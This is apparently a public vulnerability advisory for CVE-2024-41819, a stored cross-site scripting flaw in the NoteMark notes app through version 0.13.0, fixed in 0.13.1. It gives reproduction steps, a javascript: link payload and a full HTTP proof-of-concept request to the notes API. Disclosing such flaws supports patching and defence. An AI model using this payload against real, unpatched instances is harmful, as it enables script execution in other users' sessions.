CVE-2024-41819

NoteMark - Stored XSS

NoteMark is a web-based Markdown notes app.

A stored cross-site scripting (XSS) vulnerability in Note Mark allows attackers to execute arbitrary scripts via a crafted payload injected into the URL value of a link in the markdown content.

This vulnerability affects version 0.13.0 and below and was fixed in 0.13.1.

Steps to Reproduce

1. Log in to the application.

2. Create a new note or enter a previously created note.

3. Access the note editor functionality from the selected note by clicking on the "Editor" tab.

4. Input the following payload: [xss-link](javascript:alert(1))

5. Save the changes

6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert.

Proof of Concept

PUT /api/notes/<note-uuid>/content HTTP/1.1
Host: localhost:8000
Accept: */*
Content-Type: text/plain;charset=UTF-8
Content-Length: 34
Sec-Fetch-Site: same-origin
Authorization: Bearer <TOKEN>


[xss-link](javascript:alert(1))

References

• https://github.com/enchant97/note-mark

• https://nvd.nist.gov/vuln/detail/CVE-2024-41819

• https://www.exploit-db.com/exploits/52078

• https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3

• https://notemark.docs.enchantedcode.co.uk/